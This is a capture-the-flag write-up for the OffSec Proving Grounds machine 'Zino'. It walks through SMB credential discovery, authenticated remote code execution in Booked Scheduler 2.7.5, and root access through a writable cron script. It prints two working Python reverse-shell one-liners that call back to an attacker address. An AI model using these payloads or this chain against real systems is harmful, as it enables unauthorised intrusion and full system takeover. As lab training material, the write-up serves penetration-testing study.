Zino
Writeup for Zinofrom from offsec Proving Grounds
Information gathering
sudo ./nmapAutomator.sh 192.168.63.64 all
Service Enumeration
FTP (Port 21)
Doesn't seem like there's much we can do here.
SMB (Port 139,445)
Looks like we can connect as zino without any password.
Since we can also download all the files, let's do that and see if there's anything interesting.
From the misc.log
file, it seems like we have some credentials which would be useful later - admin:adminadmin
.
HTTP (Port 8003)
Looks like this is running Booked Scheduler v2.7.5 which has a RCE vulnerability. However, we must be authenticated first.
Exploit
We can try the credentials that we got from misc.log from SMB and we successfully log in.
From here we can upload a web shell to execute any commands we want.
Payload: export RHOST="192.168.49.63";export RPORT=3306;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/usr/bin/sh")'
Privesc
Running LinPeas, we can see that cleanup.py
is a cron job that runs every 3 mins.
Looking at cleanup.py
file permissions, it seems like we have the ability to edit the file.
From here we can just overwrite the data in cleanup.py
with our payload:
'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.63",21));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Now we just wait 3 mins and we got root!
Last updated